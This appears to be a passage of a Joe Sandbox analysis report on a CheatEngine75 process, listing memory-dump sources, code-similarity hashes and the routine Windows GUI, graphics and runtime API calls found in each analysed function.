                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Rect$ClientPaint$BeginH_prolog3_Validate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3883544035-0
                                                                                                                                                                                                                                      • Opcode ID: f78f1a7312592bdeee035eef4a9b8748cd1f1cc2ff8cef9c4cc765549f5dd929
                                                                                                                                                                                                                                      • Instruction ID: 8cc3339777eb56f35ac9133158b7d836a3faa721ca8b3a99bc3041d5da327fa3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f78f1a7312592bdeee035eef4a9b8748cd1f1cc2ff8cef9c4cc765549f5dd929
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2941A175A00609EFCF21AFB1CC95EAEB7B6FF49704F00456DE15AA2260EB799900CF51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6B4CE87A
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(80004005), ref: 6B4CE8C0
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 6B4CE8CC
                                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000,-00000001), ref: 6B4CE8E3
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 6B4CE8F6
                                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 6B4CE907
                                                                                                                                                                                                                                      • RemoveMenu.USER32(00000000,00000000,00000400,?,?,?,?,?,6B4C3914,6B67BC7C,0000000C,00000004,6B4C28D8,00000000), ref: 6B4CE921
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$CountItem$H_prolog3Remove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3061525546-0
                                                                                                                                                                                                                                      • Opcode ID: 586e76a02c9ba9a8802ebe8b0df60d1d422b1769e45f81f3187b4d8c3f21a69e
                                                                                                                                                                                                                                      • Instruction ID: 44a2beed8dfbe07ac8e654434aad14cd3accc838083f9248d769044d968b4c7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 586e76a02c9ba9a8802ebe8b0df60d1d422b1769e45f81f3187b4d8c3f21a69e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B21DA7994020AEBEF509F69CC8AF9F3FB9EF41B10F005129F515E6250DB78EA018B91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4D0FFE
                                                                                                                                                                                                                                      • CoCreateGuid.OLE32(?,00000034), ref: 6B4D104F
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 6B4D1228
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFreeGuidH_prolog3_String
                                                                                                                                                                                                                                      • String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$0#Lk$RestartByRestartManager$Zfk
                                                                                                                                                                                                                                      • API String ID: 1084067465-1392503517
                                                                                                                                                                                                                                      • Opcode ID: 218139c8ce68faec7c050987d0c9bd22ec3c75807ac1f7c3b3940590abebca98
                                                                                                                                                                                                                                      • Instruction ID: ebf44492b0a41f630295b895a1c6f83e1e0e673c47bf3a8b14413057daa46c07
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 218139c8ce68faec7c050987d0c9bd22ec3c75807ac1f7c3b3940590abebca98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF919F71A00119AFCF05DBB8C8A5EFEB7B9AF49214F14006DE901A7391DF78AD05DBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B500DEF: GdipGetImagePixelFormat.GDIPLUS(?,?,00000000,00000000,?,6B4FF994,A934EE1E,00000000,00000000,?), ref: 6B500DFD
                                                                                                                                                                                                                                      • GdipBitmapLockBits.GDIPLUS(00000007,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,A934EE1E,00000000,00000000,?), ref: 6B4FFB62
                                                                                                                                                                                                                                      • GdipBitmapUnlockBits.GDIPLUS(00000007,00000000,00000007,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,A934EE1E,00000000,00000000), ref: 6B4FFC4E
                                                                                                                                                                                                                                      • GdipDrawImageI.GDIPLUS(?,00000000,00000000,00000000,?,?,?,?,00022009,?,00000000,00000000,?,00000000,00000000,00000000), ref: 6B4FFCA0
                                                                                                                                                                                                                                      • GdipDeleteGraphics.GDIPLUS(?,?,00000000,00000000,00000000,?,?,?,?,00022009,?,00000000,00000000,?,00000000,00000000), ref: 6B4FFCAB
                                                                                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(?,?,?,00000000,00000000,00000000,?,?,?,?,00022009,?,00000000,00000000,?,00000000), ref: 6B4FFCB6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Gdip$Image$BitmapBits$DeleteDisposeDrawFormatGraphicsLockPixelUnlock
                                                                                                                                                                                                                                      • String ID: &$5dk
                                                                                                                                                                                                                                      • API String ID: 3470019100-293510559
                                                                                                                                                                                                                                      • Opcode ID: fb638083bbc56b2cacb41559a953f776b509bb5d012526c324a99b71d4a53ed2
                                                                                                                                                                                                                                      • Instruction ID: cdcad46b8f2b6486d0c2ced5ce72698a2c5fc15bde2b926d18cc45253dc86839
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb638083bbc56b2cacb41559a953f776b509bb5d012526c324a99b71d4a53ed2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBA140F19021299BDB24CF24CD91B99B7B8FF44354F4045E9EA09A7341DB34AE85CFA8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002000), ref: 6B501B3B
                                                                                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 6B501B56
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6B501B63
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B501BE3
                                                                                                                                                                                                                                        • Part of subcall function 6B50286D: GetObjectW.GDI32(?,00000054,?), ref: 6B502887
                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6B501A57
                                                                                                                                                                                                                                        • Part of subcall function 6B4D957B: DeleteObject.GDI32(?), ref: 6B4D958D
                                                                                                                                                                                                                                        • Part of subcall function 6B5018F9: FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,86dk,?,6B50278D,?,00000000,?), ref: 6B50191B
                                                                                                                                                                                                                                        • Part of subcall function 6B5018F9: LoadResource.KERNEL32(00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501929
                                                                                                                                                                                                                                        • Part of subcall function 6B5018F9: LockResource.KERNEL32(00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501934
                                                                                                                                                                                                                                        • Part of subcall function 6B5018F9: SizeofResource.KERNEL32(00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501942
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$Resource$Delete$Load$FindH_prolog3ImageLockSizeof
                                                                                                                                                                                                                                      • String ID: $86dk
                                                                                                                                                                                                                                      • API String ID: 1337615151-1286042190
                                                                                                                                                                                                                                      • Opcode ID: 13fbf060e2a91f090b9f9e8953b55f4ad866a0389c58df321e74464d2044b469
                                                                                                                                                                                                                                      • Instruction ID: c4f3918d5330fbffa028be961c78dc962af320786786aecd324208f76542f9fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13fbf060e2a91f090b9f9e8953b55f4ad866a0389c58df321e74464d2044b469
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84518C7190062AEBEF04DFB5C891BEDB775BF04748F008529F925A7250EF38A951CBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6B4C5B90
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6B4C5BB2
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6B4C5BD2
                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 6B4C5C76
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6B4C5C9F
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6B4C5CB7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                      • String ID: QMLk
                                                                                                                                                                                                                                      • API String ID: 1102183713-2887455121
                                                                                                                                                                                                                                      • Opcode ID: 323ee1db884a7e21acdd2ab8159e2bb2670d41826e79d523f043538704f7a89d
                                                                                                                                                                                                                                      • Instruction ID: 5e621a43b361ce1c06c54ab46a59280feb1b744ba199aae8340ff71401c6b79d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 323ee1db884a7e21acdd2ab8159e2bb2670d41826e79d523f043538704f7a89d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A551DEB5D042148BDB14CF69C582B9EBBB4EB05B14F1441ADD905AB341EB39E901CBE2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 6B4E6C2C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C77D1: UnhookWindowsHookEx.USER32(?), ref: 6B4C77FB
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 6B4E6C62
                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 6B4E6C7A
                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 6B4E6D1B
                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 6B4E6D22
                                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 6B4E6D2D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$EnableFocus$EnabledHookUnhookWindows
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 2931672367-1841850333
                                                                                                                                                                                                                                      • Opcode ID: cd94d8c4aa3e015cc7de9f75c46a4092f7010ee41c1fc1ee043bbd5934bd37be
                                                                                                                                                                                                                                      • Instruction ID: 5f548e185d3d974d5394d4ac5bede28effaaa059c5647ec421de81b19347c1db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd94d8c4aa3e015cc7de9f75c46a4092f7010ee41c1fc1ee043bbd5934bd37be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1541CF30700201AFDB44AFB4C989F99B7B5FF45305F0081ADE6198B261CF79E846CBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 6B4CB8D6
                                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 6B4CB8ED
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 6B4CB911
                                                                                                                                                                                                                                        • Part of subcall function 6B4D5C64: ScreenToClient.USER32(?,?), ref: 6B4D5C73
                                                                                                                                                                                                                                        • Part of subcall function 6B4D5C64: ScreenToClient.USER32(?,00000000), ref: 6B4D5C80
                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000015,00000000), ref: 6B4CB937
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 6B4CB940
                                                                                                                                                                                                                                      • ScrollWindow.USER32(?,?,?,?,?), ref: 6B4CB95C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ClientScreen$RectScrollVisible
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 1714389229-1841850333
                                                                                                                                                                                                                                      • Opcode ID: b9ed0bf6b55af1ac912983b830acf57393b20233c4acafcf840868d757db1a40
                                                                                                                                                                                                                                      • Instruction ID: 83791ba7bbbc60654f845d470b2a69f4b49f6df91fa9e9b9645818b59bbf5917
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9ed0bf6b55af1ac912983b830acf57393b20233c4acafcf840868d757db1a40
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD316B36A00609AFDF11DF65CC88FAF7BB9FF89B25F108059E901A7250DB78D9008B61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6B4D127D,?,?,?,?), ref: 6B4D8F3D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 6B4D8F4D
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,?,6B4D127D,?,?,?,?), ref: 6B4D8F56
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,?,6B4D127D,?,?,?,?), ref: 6B4D8F64
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                      • String ID: 0#Lk$RegisterApplicationRecoveryCallback$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 2061474489-2401440456
                                                                                                                                                                                                                                      • Opcode ID: 6c03cd3457f2550859e68475669c2765833b87da24cff186d89ef34640a50f74
                                                                                                                                                                                                                                      • Instruction ID: cbf3ff72ce344b992cc8df125b0a9d64b3c2ffa3cd361b561e247d4b8fee3c03
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c03cd3457f2550859e68475669c2765833b87da24cff186d89ef34640a50f74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F0897254522AAFDF213FA6CC18CAA7FBAEF1A7913046155FD15D7320D739C8128BA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6B4D88DB
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6B4D88EB
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6B4D88F4
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 6B4D8902
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                      • String ID: 0#Lk$ChangeWindowMessageFilter$user32.dll
                                                                                                                                                                                                                                      • API String ID: 2061474489-175879766
                                                                                                                                                                                                                                      • Opcode ID: a31b053647e866e3f8780ac3398a1137d7b9b5af076ecd1c6132d4d108654cdb
                                                                                                                                                                                                                                      • Instruction ID: 0bc88c8092c312efafaabecf58325adfa5cbba0fef33ee4bfa24aece6bdeaa26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a31b053647e866e3f8780ac3398a1137d7b9b5af076ecd1c6132d4d108654cdb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDF01272545165ABDF213FB68C28FAABBA8EA0669134060A1FC05D2310DB38D8028BE5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(uxtheme.dll,?,6B4FC642,?,?,6B4FC28B,A934EE1E,?,?,?,Function_0016966C,000000FF), ref: 6B4D8883
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,BufferedPaintUnInit), ref: 6B4D8893
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,6B4FC642,?,?,6B4FC28B,A934EE1E,?,?,?,Function_0016966C,000000FF), ref: 6B4D889C
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,6B4FC642,?,?,6B4FC28B,A934EE1E,?,?,?,Function_0016966C,000000FF), ref: 6B4D88AA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
